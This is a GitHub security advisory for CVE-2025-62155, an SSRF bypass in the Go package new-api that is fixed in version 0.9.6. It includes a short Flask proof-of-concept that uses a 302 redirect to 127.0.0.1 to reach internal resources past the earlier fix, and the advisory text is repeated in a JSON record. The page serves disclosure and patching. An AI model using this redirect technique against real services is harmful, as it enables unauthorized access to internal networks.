GHSA-9F46-W24H-69W4

Vulnerability from github – Published: 2025-11-24 20:05 – Updated: 2025-12-17 00:31
VLAI?
Summary
new-api is vulnerable to SSRF Bypass
Details

Summary

A recently patched SSRF vulnerability contains a bypass method that can bypass the existing security fix and still allow SSRF to occur. Because the existing fix only applies security restrictions to the first URL request, a 302 redirect can bypass existing security measures and successfully access the intranet.

Details

Use the following script to deploy on the attacker's server. Since ports 80, 443, and 8080 are default ports within the security range set by the administrator and will not be blocked, the service is deployed on port 8080.

from flask import Flask, redirect  

app = Flask(__name__)  

@app.route('/redirect')  
def ssrf_redirect():  
    return redirect('http://127.0.0.1:8003/uid.txt', code=302)  

if __name__ == '__main__':  
    app.run(host='0.0.0.0', port=8080)

Then, a request is made to the malicious service opened by the attacker, and it can be found that the resources on the intranet are successfully accessed. image At the same time, the locally opened service 127.0.0.1:8083/uid.txt also received related requests. image

Impact

Using 302 redirects to bypass previous SSRF security fixes

Severity ?
8.5 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/QuantumNous/new-api"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-62155"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-11-24T20:05:21Z",
    "nvd_published_at": "2025-11-25T00:15:46Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA recently patched SSRF vulnerability contains a bypass method that can bypass the existing security fix and still allow SSRF to occur.\nBecause the existing fix only applies security restrictions to the first URL request, a 302 redirect can bypass existing security measures and successfully access the intranet.\n\n### Details\nUse the following script to deploy on the attacker\u0027s server. Since ports 80, 443, and 8080 are default ports within the security range set by the administrator and will not be blocked, the service is deployed on port 8080.\n```\nfrom flask import Flask, redirect  \n  \napp = Flask(__name__)  \n  \n@app.route(\u0027/redirect\u0027)  \ndef ssrf_redirect():  \n    return redirect(\u0027http://127.0.0.1:8003/uid.txt\u0027, code=302)  \n  \nif __name__ == \u0027__main__\u0027:  \n    app.run(host=\u00270.0.0.0\u0027, port=8080)\n```\nThen, a request is made to the malicious service opened by the attacker, and it can be found that the resources on the intranet are successfully accessed.\n\u003cimg width=\"663\" height=\"60\" alt=\"image\" src=\"https://github.com/user-attachments/assets/2f296cff-510d-4cfe-8509-518e747bf8fe\" /\u003e\nAt the same time, the locally opened service 127.0.0.1:8083/uid.txt also received related requests.\n\u003cimg width=\"717\" height=\"79\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d6b6d2cc-280b-45b5-9946-10b7891bf017\" /\u003e\n\n### Impact\nUsing 302 redirects to bypass previous SSRF security fixes",
  "id": "GHSA-9f46-w24h-69w4",
  "modified": "2025-12-17T00:31:18Z",
  "published": "2025-11-24T20:05:21Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/QuantumNous/new-api/security/advisories/GHSA-9f46-w24h-69w4"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62155"
    },
    {
      "type": "WEB",
      "url": "https://github.com/QuantumNous/new-api/commit/e8966c73746d35bb7f4f014ad1195a96d445cacd"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/QuantumNous/new-api"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "new-api is vulnerable to SSRF Bypass"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.